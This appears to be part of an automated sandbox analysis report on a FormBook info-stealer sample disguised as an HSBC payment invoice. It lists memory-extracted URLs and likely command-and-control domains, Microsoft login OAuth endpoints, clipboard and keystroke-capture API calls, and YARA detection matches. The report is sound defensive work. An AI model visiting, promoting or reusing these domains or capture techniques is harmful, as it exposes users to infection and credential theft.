            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.sophiahotelqingdao.com/news/bDhM.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yuanjihua.vip/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl100g.website
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl100g.website/news/Snfj.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1gya.website/news/X59A.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/450c/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/baike/
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_07.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_08.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_11.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_14.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_34.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_35.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_37.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_39.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_46.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_50.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_51.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_52.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_54.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_56.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_61.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_65.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_66.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_68.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_70.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_72.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_77.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_78.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_8.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_80.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/post/1_90.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/redian/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/shishang/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/favicon.ico
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/css/animate.css
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/css/style.css
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/css/swiper.min.css
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/js/common.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/js/fancybox.umd.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/js/html2canvas.min.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/js/html5shiv.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/js/jquery-2.2.4.min.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/js/jquery.lazy.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/js/swiper.min.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/js/wow.min.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/picture/202209041662300408955816.png
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/xiuxian/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/yule/
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/zhishi/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/zixun/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1wsm.website
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zloyow.website/
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004A9A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.livechatinc.com/tracking.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.00000000055C8000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000003C78000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.00000000055C8000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000003C78000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: rundll32.exe, 0000000B.00000002.3728535943.00000000055C8000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000003C78000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.leisu.com/uploads/allimg/190516/1-1Z51621O53-53.jpg
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: rundll32.exe, 0000000B.00000003.1701041630.00000000079B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002A62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002A62000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002A62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002A62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: rundll32.exe, 0000000B.00000002.3728535943.00000000063EA000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004A9A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://v-cn.vaptcha.com/v3.js
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000050E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.lavillitadepapa.com/6qht/?ylT8el=uv
            Source: rundll32.exe, 0000000B.00000002.3728535943.00000000063EA000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004A9A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.livechat.com/?welcome
            Source: rundll32.exe, 0000000B.00000002.3728535943.00000000063EA000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004A9A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.livechat.com/chat-with/14282961/
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EF425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,0_2_00EF425A
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EF4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00EF4458
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EF425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,0_2_00EF425A
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EE0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00EE0219
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F0CDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3725622704.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3725563654.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1520805638.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3725564617.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1521716208.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3725622704.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3725563654.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
